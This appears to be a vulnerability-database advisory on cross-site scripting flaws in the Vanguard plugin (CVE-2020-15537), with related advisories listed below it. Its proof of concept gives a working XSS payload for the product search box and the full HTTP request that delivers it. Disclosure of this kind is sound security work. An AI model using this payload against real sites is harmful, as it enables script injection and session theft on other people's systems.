Vanguard <= 2.1 – Multiple Cross-Site Scripting (XSS) | CVE 2020-15537 | Plugin Vulnerabilities

Description

The plugin does not sanitise, validate or escape some of its parameters before outputting the back in various place, leading to either Stored or Reflected Cross-Site Scripting issues

Proof of Concept

Put the following payload in the In Products Search box: "><img src=x onerror=prompt(/XSS/);>

POST /search HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
Connection: close
Upgrade-Insecure-Requests: 1

phps_query=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSS%2F%29%3B%3E&phps_search=

Affects Plugins

No known fix

References

CVE

URL

https://packetstormsecurity.com/files/#157099/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

thelastvvv

Verified

Yes

WPVDB ID

7615801d-f399-4dc7-bb0b-41877c8cbb3b

Timeline

Publicly Published

2020-04-06 (about 6 years ago)

Added

2021-06-29 (about 4 years ago)

Last Updated

2022-01-17 (about 4 years ago)

Other

Published

Title

Published

2014-11-20

Title

Contact Bank Standard Edition <= 2.0.69 - Cross-Site Scripting (XSS)

Published

2017-07-20

Title

Arabic Font - CSRF & Stored XSS

Published

2025-01-16

Title

Content Planner <= 1.0 - Reflected Cross-Site Scripting

Published

2020-07-13

Title

Prolisting - Directory Listing < 1.27 - Unauthenticated Reflected XSS

Published

2025-07-30

Title

WPFunnels < 3.5.27 - Authenticated (Contributor+) Stored Cross-Site Scripting